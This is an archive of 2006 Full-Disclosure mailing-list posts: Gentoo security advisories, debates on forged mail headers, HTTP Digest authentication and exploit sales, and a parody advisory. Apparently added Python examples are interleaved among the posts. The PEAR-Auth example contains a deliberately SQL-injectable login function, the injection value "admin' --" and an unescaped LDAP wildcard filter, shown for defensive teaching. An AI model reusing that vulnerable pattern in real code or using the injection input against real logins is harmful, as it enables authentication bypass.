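\tfor <full-disclosure@lists.grok.org.uk>; Thu, 16 Mar 2006 13:29:40 +0000
Received: from trustworthy.example ([203.0.113.5])
\tby mail.somewhere.example with ESMTP; Thu, 16 Mar 2006 13:28:00 +0000
From: someone@example.net
Subject: constructed sample
"""

Hop = Tuple[Optional[str], Optional[str]]  # (from host, by host)

_FROM = re.compile(r"\bfrom\s+([^\s(\[]+)", re.IGNORECASE)
_BY = re.compile(r"\bby\s+([^\s(\[]+)", re.IGNORECASE)


def unfold(raw: str) -> List[str]:
    """Join folded header lines: a continuation line starts with whitespace."""
    lines: List[str] = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_received(raw: str) -> List[Hop]:
    """(from, by) for each Received: line, newest hop first as in the message."""
    hops: List[Hop] = []
    for line in unfold(raw):
        if not line.lower().startswith("received:"):
            continue
        m_from, m_by = _FROM.search(line), _BY.search(line)
        hops.append((m_from.group(1).lower() if m_from else None,
                     m_by.group(1).lower() if m_by else None))
    return hops


def verifiable_hops(hops: List[Hop], trusted: str) -> List[Hop]:
    """Return the prefix of the chain that a header from `trusted` vouches for.

    Each Received: line is prepended by the host that accepted the mail, so
    hops[0] is the newest.  Starting at the first line stamped by the trusted
    host, the next line is accepted only if it was stamped by the host the
    previous line says it received from (lists.grok.org.uk says "from
    toad.com", and the next line says "by toad.com").  At the first mismatch
    the chain stops: anything below it could have been typed in by whoever
    spoke to the last corroborated hop, so it proves nothing.
    """
    trusted = trusted.lower()
    start = next((i for i, (_, by) in enumerate(hops) if by == trusted), None)
    if start is None:
        return []
    chain = [hops[start]]
    for hop in hops[start + 1:]:
        if hop[1] is None or hop[1] != chain[-1][0]:
            break
        chain.append(hop)
    return chain


def corroborated_relay(raw: str, trusted: str) -> Optional[str]:
    """The host that handed the mail to `trusted` and whose own stamp checks
    out (toad.com in the thread), or None if nothing corroborates it."""
    chain = verifiable_hops(parse_received(raw), trusted)
    return chain[1][1] if len(chain) >= 2 else None


if __name__ == "__main__":
    hops = parse_received(SAMPLE_HEADERS)
    good = verifiable_hops(hops, "lists.grok.org.uk")
    for hop in hops:
        status = "verified  " if hop in good else "unverified"
        print(f"{status}  from={hop[0]}  by={hop[1]}")
    print("relay that really accepted it:",
          corroborated_relay(SAMPLE_HEADERS, "lists.grok.org.uk"))
```

The third header in the sample is the one nobody vouches for: whether it came from a forged line or a genuine upstream hop cannot be told from the mail itself, which is the point about only trusting headers added by boxes you control.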

[Full-disclosure] Re: Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=%Buffer Overflow in Microsoft Access

2006-03-17 Thread Dave Korn
leToff wrote:
> Dave Korn wrote :
>
>>  I don't see how you could tell from that received header whether the
>> machine is a proxy, or whether it originated the traffic itself.
>>
>>
> Simply because I sent that message myself using telnet connected to
> the 1st MX of toad.com (not tested the 2nd).

  Ah, well, that wasn't exactly obvious from the Received header that you 
posted, now was it?!  Heh, that was one vital piece of info without which 
nobody could be sure they understood exactly what it was that you were 
showing us.  I thought it might have been a quote from one of the headers of 
one of the spams!

> It's so easy to verify by
> yourself that I don't understand why you don't trust me.

  Oh, I do believe you; I was just pointing out that the evidence you were 
showing was insufficiently clear/complete.

> BTW, Open Relay is probably more appropriate to define this machine.

  The toad machine certainly is an open relay, the one that was connecting 
to it is an anonymising mix-proxy.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





[Full-disclosure] Re: HTTP AUTH BASIC monowall

2006-03-17 Thread Dave Korn
Jason Coombs wrote:
>> Brian Eaton wrote:
>>> I'd like to see their process
>>> changed so that it included a more
>>> serious check into the business
>>> whose web site they are verifying.
>>
>> This makes no sense at all, and is simply impossible within the DNS
>> system. Furthermore, all verification done by any CA can be easily
>> fooled.

  That may be the case in practice, but it's surely not an absolute 
theoretical limitation?  I would have thought it should be perfectly 
/possible/ to set up a CA that really did do a good job; that wouldn't issue 
a certificate except in person, that insists on sending one of the CA's 
staff round to the subscriber's business premises to meet them personally, 
look at the buildings, look at whether it's an established business with a 
history of trading, ask to see customer testimonials, etc. etc.

  It might still be possible to fool them but it would suddenly require you 
to hire a bunch of actors, rent business premises, forge dozens of copies of 
old newspapers to look like you've been in existence and advertising for 
some years it's suddenly a /much/ steeper barrier than some stupid 
automated system that some stupid skiddie can email from some stupid open 
proxy.

  And of course that's the real reason why CA verification can be defeated: 
not because there's some technical, logical, social or moral impossibility 
about it; merely because automation is cheap and the corporations that 
perform it are cheapskates who care only about the bottom line and don't 
mind providing a shit service that fails to fulfill its requirements.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Jason
I do not think that digest over basic is really going to help in the
MITM case either since the attacker that can successfully pull off the
SSL MITM he controls the connection. Digest avoids disclosing the actual
password but it does not necessarily prevent the attacker from changing
it. The attacker can now not only access the system impersonating you
but hijack it from you just as if he had the actual password.

Digest also does not prevent the attacker in this case from presenting
the client with data that produces a reversible or discoverable text
thereby recovering an _effective_ password.


"
   Like Basic Access Authentication, the Digest scheme is based on a
   simple challenge-response paradigm. The Digest scheme challenges
   using a nonce value. A valid response contains a checksum (by
   default, the MD5 checksum) of the username, the password, the given
   nonce value, the HTTP method, and the requested URI. In this way, the
   password is never sent in the clear. Just as with the Basic scheme,
   the username and password must be prearranged in some fashion not
   addressed by this document.
"

The attacker now needs to provide a nonce and wait for the reply. The
ability to control data that will be used in the hash is key to making
it potentially successful. The nonce, username, HTTP method, and URI
will all be known at this point. Now the attacker only needs to find a
hash collision with _any_ password that satisfies the checksum and the
game is again over.

http://www.stachliu.com/collisions.html

New average run time on P4 1.6ghz PC - 45 minutes

I don't think that the attacker needs to actually launch a collision
attack because they have all but one component used in the hash. Now the
attacker only need to launch a dictionary attack against the provided
hash and they likely will find the result.

Given that the attacker controls the connection they can learn the
requisite details by observing normal interaction and producing a
precomputed hash table with the nonce they plan on providing. This could
result in a near real-time compromise of the password when an actual
attack is launched.

A solution that requires another successful MITM is required to add any
real complexity to the equation. The solution must introduce a
computational complexity that removes the precomputed and known text
attack vectors. Any solution that does not is ultimately no better when
considered in the context of a successful MITM. Digest raises the bar a
little more but I do not think it will solve the problem.

Simon Smith wrote:
> Thanks felix!
> 
> Felix Lindner wrote:
> 
>>Hi,
>>
>>On Thu, 16 Mar 2006 09:48:07 -0500
>>Simon Smith <[EMAIL PROTECTED]> wrote:
>>  
>>
>>>My first thought was on how to harden the
>>>authentication because the basic auth didn't cut it for me. That's what I
>>>am looking for ideas for.
>>>
>>
>>you may be looking for Digest Authentication:
>>http://www.ietf.org/rfc/rfc2617.txt:
>>
>>   "Like Basic, Digest access authentication verifies that both parties
>>   to a communication know a shared secret (a password); unlike Basic,
>>   this verification can be done without sending the password in the
>>   clear, which is Basic's biggest weakness. As with most other
>>   authentication protocols, the greatest sources of risks are usually
>>   found not in the core protocol itself but in policies and procedures
>>   surrounding its use."
>>
>>cheers
>>FX
>>
>>  
> 
> 
> 



[Full-disclosure] [ GLSA 200603-16 ] Metamail: Buffer overflow

2006-03-17 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Metamail: Buffer overflow
      Date: March 17, 2006
      Bugs: #126052
        ID: 200603-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in Metamail could possibly be exploited to execute
arbitrary code.

Background
==========

Metamail is a program that decodes MIME encoded mail.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable    /            Unaffected
    -------------------------------------------------------------------
  1  net-mail/metamail        < 2.7.45.3-r1          >= 2.7.45.3-r1

Description
===========

Ulf Harnhammar discovered a buffer overflow in Metamail when processing
MIME boundaries.

Impact
======

By sending a specially crafted email, attackers could potentially
exploit this vulnerability to crash Metamail or to execute arbitrary
code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Metamail users should update to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/metamail-2.7.45.3-r1"

References
==========

  [ 1 ] CVE-2006-0709
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0709

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



Re: [Full-disclosure] [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities

2006-03-17 Thread crazy frog crazy frog
hi list,
we need to test the protocol decoding ability of IDS/IPS. Any idea or
link to any resource or tool will be greatly appreciated.
thanks for your help in advance,
CF



[Full-disclosure] [ GLSA 200603-15 ] Crypt::CBC: Insecure initialization vector

2006-03-17 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Crypt::CBC: Insecure initialization vector
      Date: March 17, 2006
      Bugs: #126048
        ID: 200603-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Crypt::CBC uses an insecure initialization vector, potentially
resulting in a weaker encryption.

Background
==========

Crypt::CBC is a Perl module to encrypt data using cipher block chaining
(CBC).

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable    /            Unaffected
    -------------------------------------------------------------------
  1  dev-perl/crypt-cbc          < 2.17                   >= 2.17

Description
===========

Lincoln Stein discovered that Crypt::CBC fails to handle 16 bytes long
initialization vectors correctly when running in the RandomIV mode,
resulting in a weaker encryption because the second part of every block
will always be encrypted with zeros if the blocksize of the cipher is
greater than 8 bytes.

Impact
======

An attacker could exploit weak ciphertext produced by Crypt::CBC to
bypass certain security restrictions or to gain access to sensitive
data.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Crypt::CBC users should upgrade to the latest available version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-perl/crypt-cbc-2.17"

References
==========

  [ 1 ] CVE-2006-0898
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0898

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



[Full-disclosure] [ GLSA 200603-14 ] Heimdal: rshd privilege escalation

2006-03-17 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Heimdal: rshd privilege escalation
      Date: March 17, 2006
      Bugs: #121839
        ID: 200603-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An error in the rshd daemon of Heimdal could allow authenticated users
to elevate privileges.

Background
==========

Heimdal is a free implementation of Kerberos 5.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable    /            Unaffected
    -------------------------------------------------------------------
  1  app-crypt/heimdal           < 0.7.2                  >= 0.7.2

Description
===========

An unspecified privilege escalation vulnerability in the rshd server of
Heimdal has been reported.

Impact
======

Authenticated users could exploit the vulnerability to escalate
privileges or to change the ownership and content of arbitrary files.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Heimdal users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-crypt/heimdal-0.7.2"

References
==========

  [ 1 ] CAN-2006-0582
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-0582
  [ 2 ] Heimdal Advisory 2006-02-06
        http://www.pdc.kth.se/heimdal/advisory/2006-02-06/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Simon Smith
Thanks felix!

Felix Lindner wrote:
> Hi,
>
> On Thu, 16 Mar 2006 09:48:07 -0500
> Simon Smith <[EMAIL PROTECTED]> wrote:
>   
>> My first thought was on how to harden the
>> authentication because the basic auth didn't cut it for me. That's what I
>> am looking for ideas for.
>> 
>
> you may be looking for Digest Authentication:
> http://www.ietf.org/rfc/rfc2617.txt:
>
>"Like Basic, Digest access authentication verifies that both parties
>to a communication know a shared secret (a password); unlike Basic,
>this verification can be done without sending the password in the
>clear, which is Basic's biggest weakness. As with most other
>authentication protocols, the greatest sources of risks are usually
>found not in the core protocol itself but in policies and procedures
>surrounding its use."
>
> cheers
> FX
>
>   


-- 
Regards, 
Jackass




Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Simon Smith
Brian,
I fully agree and thanks for the references. My next step after I'd
found a good solution was going to be focusing on session security.
Thanks for the input/help man. I appreciate it!

Brian Eaton wrote:
> Simon Smith simon at snosoft.com wrote
>   
>> My first thought was on how to harden the
>> authentication because the basic auth didn't cut it for me. That's what I
>> am looking for ideas for.
>> 
>
> Here are some things to start with:
>
> Client certificates.
> Kerberos.
> Two-factor authentication.
>
> Unfortunately with web applications you not only need to worry about
> the initial authentication, but how the session is maintained.  If the
> session is maintained using cookies, all the strong authentication in
> the world won't save you from having that session hijacked.
>
> - Brian
>
>   


-- 
Regards, 
Jackass




[Full-disclosure] [ GLSA 200603-13 ] PEAR-Auth: Potential authentication bypass

2006-03-17 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: PEAR-Auth: Potential authentication bypass
      Date: March 17, 2006
      Bugs: #123832
        ID: 200603-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

PEAR-Auth did not correctly verify data passed to the DB and LDAP
containers, thus allowing an attacker to inject false credentials to
bypass the authentication.

Background
==========

PEAR-Auth is a PEAR package that provides methods to create a PHP based
authentication system.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable    /            Unaffected
    -------------------------------------------------------------------
  1  dev-php/PEAR-Auth           < 1.2.4                  >= 1.2.4

Description
===========

Matt Van Gundy discovered that PEAR-Auth did not correctly validate
data passed to the DB and LDAP containers.

Impact
======

A remote attacker could possibly exploit this vulnerability to bypass
the authentication mechanism by injecting specially crafted input to
the underlying storage containers.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PEAR-Auth users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-php/PEAR-Auth-1.2.4"

References
==========

  [ 1 ] CVE-2006-0868
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0868

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


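The advisory names the flaw (unvalidated data reaching the DB and LDAP containers) but not the pattern behind it. As an added illustration, not PEAR-Auth's own code, the block below shows the class of bug such a container can have and its fix: credentials spliced into a query versus bound parameters, and an unescaped LDAP filter versus RFC 4515 escaping. The table, account, hash function and filter shape are constructed for the example.

```python
import hashlib
import hmac
import sqlite3

# --- DB container ----------------------------------------------------------

def password_hash(password: str) -> str:
    """Stand-in for whatever a real container stores; the flaw under
    discussion is in how the query is built, not in the hash."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", password_hash("correct horse")))
    conn.commit()
    return conn


def authenticate_unsafe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Flawed pattern: the submitted username becomes part of the SQL text.
    A username carrying a quote and a comment marker rewrites the WHERE
    clause so the password column is never compared at all."""
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password_hash(password)))
    return conn.execute(sql).fetchone() is not None


def authenticate_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: a bound parameter keeps the input as data whatever it
    contains, and the hash comparison happens outside the query."""
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], password_hash(password))


# --- LDAP container --------------------------------------------------------

# RFC 4515 escapes for characters that have meaning inside a search filter.
_LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\0": "\\00"}


def ldap_filter_escape(value: str) -> str:
    """Escape a value before embedding it in a filter; each character is
    mapped once, so nothing is double-escaped."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def uid_filter(username: str, escape: bool = True) -> str:
    """Filter a container would use to look the user up before binding.
    Unescaped, a username such as "*" turns the equality match into a
    wildcard that matches every entry in the directory."""
    uid = ldap_filter_escape(username) if escape else username
    return "(&(objectClass=person)(uid=%s))" % uid


if __name__ == "__main__":
    db = build_db()
    crafted = "admin' --"  # the comment marker ends the statement early
    print("unsafe, crafted username, empty password:", authenticate_unsafe(db, crafted, ""))
    print("safe,   crafted username, empty password:", authenticate_safe(db, crafted, ""))
    print("safe,   real credentials:               ", authenticate_safe(db, "admin", "correct horse"))
    print(uid_filter("*", escape=False), "->", uid_filter("*"))
```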

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

2006-03-17 Thread Brian Eaton
On 3/16/06, Felix Lindner <[EMAIL PROTECTED]> wrote:
> you may be looking for Digest Authentication:
> http://www.ietf.org/rfc/rfc2617.txt:
>
>"Like Basic, Digest access authentication verifies that both parties
>to a communication know a shared secret (a password); unlike Basic,
>this verification can be done without sending the password in the
>clear, which is Basic's biggest weakness. As with most other
>authentication protocols, the greatest sources of risks are usually
>found not in the core protocol itself but in policies and procedures
>surrounding its use."

Digest probably isn't a good answer to a MITM attack, because as far
as I can tell there is nothing stopping the MITM from downgrading to
BA.

I haven't actually tested this.  Maybe the browsers have config
options to disable BA authentication, or at least give some kind of
visual indicator that the authentication is digest rather than basic.

- Brian

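Both objections raised earlier in this thread can be seen in a few lines: Jason's, that everything in the Digest checksum except the password is visible to whoever controls the connection, and Brian's, that nothing stops a man-in-the-middle from downgrading the challenge to Basic. The following added example, not from the thread, parses a WWW-Authenticate challenge, refuses Basic instead of falling back, computes the RFC 2617 response and verifies it server-side; the realm, nonce and credentials are constructed.

```python
import hashlib
import re
import secrets
from typing import Dict, Optional

# Constructed challenges in the style an embedded admin interface would send;
# the realm and nonce values are made up for this example.
DIGEST_CHALLENGE = ('Digest realm="m0n0wall", qop="auth", '
                    'nonce="0123456789abcdef0123456789abcdef", algorithm=MD5')
BASIC_CHALLENGE = 'Basic realm="m0n0wall"'

_PARAM = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^\s,]+))')


def parse_challenge(header: str) -> Dict[str, str]:
    """Split a WWW-Authenticate value into its scheme and parameters."""
    scheme, _, rest = header.strip().partition(" ")
    params = {key.lower(): quoted or token
              for key, quoted, token in _PARAM.findall(rest)}
    params["scheme"] = scheme.lower()
    return params


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(user: str, password: str, method: str, uri: str, realm: str,
                    nonce: str, qop: Optional[str], nc: str, cnonce: str) -> str:
    """RFC 2617 response value.  Of all these inputs only `password` never
    crosses the wire; the rest are in the challenge or in the reply itself."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")  # RFC 2069 compatible form, no qop


def answer_challenge(header: str, user: str, password: str, method: str,
                     uri: str) -> Optional[Dict[str, Optional[str]]]:
    """Client side.  Returns Authorization parameters for a Digest challenge.
    A Basic challenge gets None: a client that quietly falls back to Basic
    hands whoever sits on the path the password in the clear, which is the
    downgrade Brian describes."""
    p = parse_challenge(header)
    if p["scheme"] != "digest":
        return None
    nc, cnonce = "00000001", secrets.token_hex(8)
    return {
        "username": user, "realm": p["realm"], "nonce": p["nonce"], "uri": uri,
        "qop": p.get("qop"), "nc": nc, "cnonce": cnonce,
        "response": digest_response(user, password, method, uri, p["realm"],
                                    p["nonce"], p.get("qop"), nc, cnonce),
    }


def verify(creds: Dict[str, Optional[str]], method: str, password: str) -> bool:
    """Server side: recompute and compare.  This is also exactly the check an
    observer of the exchange can run offline with a candidate password, one
    MD5 chain per guess, which is the weakness Jason describes: the nonce
    adds nothing when the party checking guesses already knows it."""
    expected = digest_response(creds["username"], password, method, creds["uri"],
                               creds["realm"], creds["nonce"], creds.get("qop"),
                               creds["nc"], creds["cnonce"])
    return secrets.compare_digest(expected, creds["response"])


if __name__ == "__main__":
    creds = answer_challenge(DIGEST_CHALLENGE, "admin", "correct horse", "GET", "/")
    print("digest response:", creds["response"])
    print("server accepts right password:", verify(creds, "GET", "correct horse"))
    print("server accepts wrong password:", verify(creds, "GET", "wrong"))
    print("client answers a Basic challenge:",
          answer_challenge(BASIC_CHALLENGE, "admin", "correct horse", "GET", "/"))
```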


Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread Valdis . Kletnieks
On Fri, 17 Mar 2006 11:33:30 EST, gboyce said:

> The Redhat case is different.  They are distributing software that they 
> are licensed to distribute in a for-pay manner (the GPL allows for the 
> sale of software as long as you don't restrict the rights granted by the 
> GPL).

In addition, if you're paying RedHat money, you're not paying for the software,
you're paying for a maintenance contract - what you're getting there is a copy
of the software packaged so it can be installed easily, the ability to call
RedHat for technical support, and updates.  If you dig around, you can find all
the pieces you need to do a totally free Linux-from-scratch from RedHat - but
you'll have to do it on your own, as they won't help or even answer the phone.

If you order the software on CD, they attach a small media charge, also
permitted by the GPL.



Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread Valdis . Kletnieks
On Fri, 17 Mar 2006 08:44:10 +0100, Michal Zalewski said:
> On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:
> 
> > If you publish something without a license it is OPEN DOMAIN
> > That means people can use it, modify it, sell it...
> 
> That's nonsense. If I publish a book or a photo or a newspaper article
> without a lengthy license attached, you can copy it at will, too? The
> requirement of a license or a copyright notice is a long-running myth - it
> is good to have these, but they are not a legal requirement.

In most countries that have copyright laws aligned with the Bern Convention,
all works are automatically copyrighted at the time of creation (in the US,
this applies to works created after 1978 - for pre-78, contact a good copyright
lawyer).  However, under US law, failing to attach a proper copyright notice,
and more importantly registering the work with the US Copyright Office, means
that the copyright holder is unable to claim certain damages (basically, you
can't get money from the offender, but you can still get them to stop
infringing).

For the US, the gory details are all in the US Code, Title 17.

However, Michal is correct in that barring an explicit agreement (such as
code that's GPL, or a Creative Commons license, or other such), in most of the
civilized world, anything found online should be assumed to be copyrighted, and
you better hope some variant of "fair use" covers your use of the material.

This is a big legal quagmire that nobody wants to create a test case for - in
fact, in the US, I don't believe any court has yet decisively ruled whether
the act of downloading a webpage from a server (thus creating a locally cached
copy) is covered under "fair use".  17 USC 117 (a)(1) discusses the copy of
a program that's created when loading it into RAM, but it's pretty specific
to "the owner of a computer program" (incidentally, this is problematic in
US states that signed UCITA, as software is considered leased, not sold, so
you're not the owner of the software).



Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread gboyce

On Fri, 17 Mar 2006, Steven Rakick wrote:

> Give me a break.
>
> If I discovered a technique for turning copper into
> gold and published it on FD, would you consider it
> unethical for someone with more business sense to make
> money off of it?
>
> Look at Redhat...

The Redhat case is different.  They are distributing software that they 
are licensed to distribute in a for-pay manner (the GPL allows for the 
sale of software as long as you don't restrict the rights granted by the 
GPL).

From what I've heard so far, FrSIRT is selling information and code that 
was not distributed under a clear license.



Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread Steven Rakick
Give me a break. 

If I discovered a technique for turning copper into
gold and published it on FD, would you consider it
unethical for someone with more business sense to make
money off of it?

Look at Redhat...



Re: [Full-disclosure] MSN Passport Cert improperly issued

2006-03-17 Thread Tim

Do you have any idea how many people are subscribed to this list?  When
you attach even a slightly large file to your emails, you amplify that
traffic several hundred(thousand?)-fold.  Many people on the list may
not give a shit about your post. (Although this one is moderately
interesting.)  It is just a big waste of bandwidth for this free
service.

Please be polite and post your jpg to your website, and provide a link.
Email was never intended for file transfer in the first place, and isn't
particularly efficient at it.

thanks,
tim



Re: [Full-disclosure] [ADVISORY] # =Thu Mar 16 21:01:59 EST 2006= # Heap Overflow in Ethereal

2006-03-17 Thread bigdaddyzeroday
They should do better by putting in a valid-looking CVE and info.  That would be 
funny.

On Thu, 16 Mar 2006 18:02:04 -0800 [EMAIL PROTECTED], 
[EMAIL PROTECTED] wrote:
>[ADVISORY] # =Thu Mar 16 21:01:59 EST 2006= # Heap Overflow in 
>Ethereal
>
>
>
>
>8=D~~
>1. HISTORY
>8=D~~
>20/1/2006 - Vendor Notification.
>16/3/2006 - Public Disclosure.
>8=D~~
>2. CVE INFORMATION
>8=D~~
>The Common Vulnerabilities and Exposures (CVE) project has 
>assigned the name CVE-2006-820356 to this issue
>
>
>
>8=D~~
>CONTACT
>8=D~~
>[EMAIL PROTECTED] [EMAIL PROTECTED]
>1-888-565-9428
>
>CISSP GSAE CEH CSFA GREM SSP-MPA GWAS SSCP 
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread bigdaddyzeroday
They did not write these themselves.  Not nice to make money from other 
people's work.  If I submit an exploit to FrSIRT, do I get money?



On Thu, 16 Mar 2006 16:06:55 -0800 "Ivan ." <[EMAIL PROTECTED]> 
wrote:
>http://www.eweek.com/article2/0,1895,1938511,00.asp
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] What about subscriber only?

2006-03-17 Thread bigdaddyzeroday
Like it is now?  Get a grip.  It is easy to dump the list subscribers and use 
them to seed spam mail that passes the posting rules.

On Thu, 16 Mar 2006 16:05:34 -0800 Chris Umphress 
<[EMAIL PROTECTED]> wrote:
>On 3/16/06, Steve Friedl <[EMAIL PROTECTED]> wrote:
>> On Thu, Mar 16, 2006 at 09:32:11PM +0100, Stefan Triller wrote:
>> > my killfile is getting bigger and bigger, because of the spam 
>on this list.
>> > What about closing this list for email adresses which aren't 
>subscribed to it?
>> > This would minimize the spam.
>>
>> Then the spam would simply come "from" list subscribers :-(
>
>But then it would all be coming from one or two addresses. It's 
>easier
>to delete that way.
>
>--
>Chris Umphress 
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
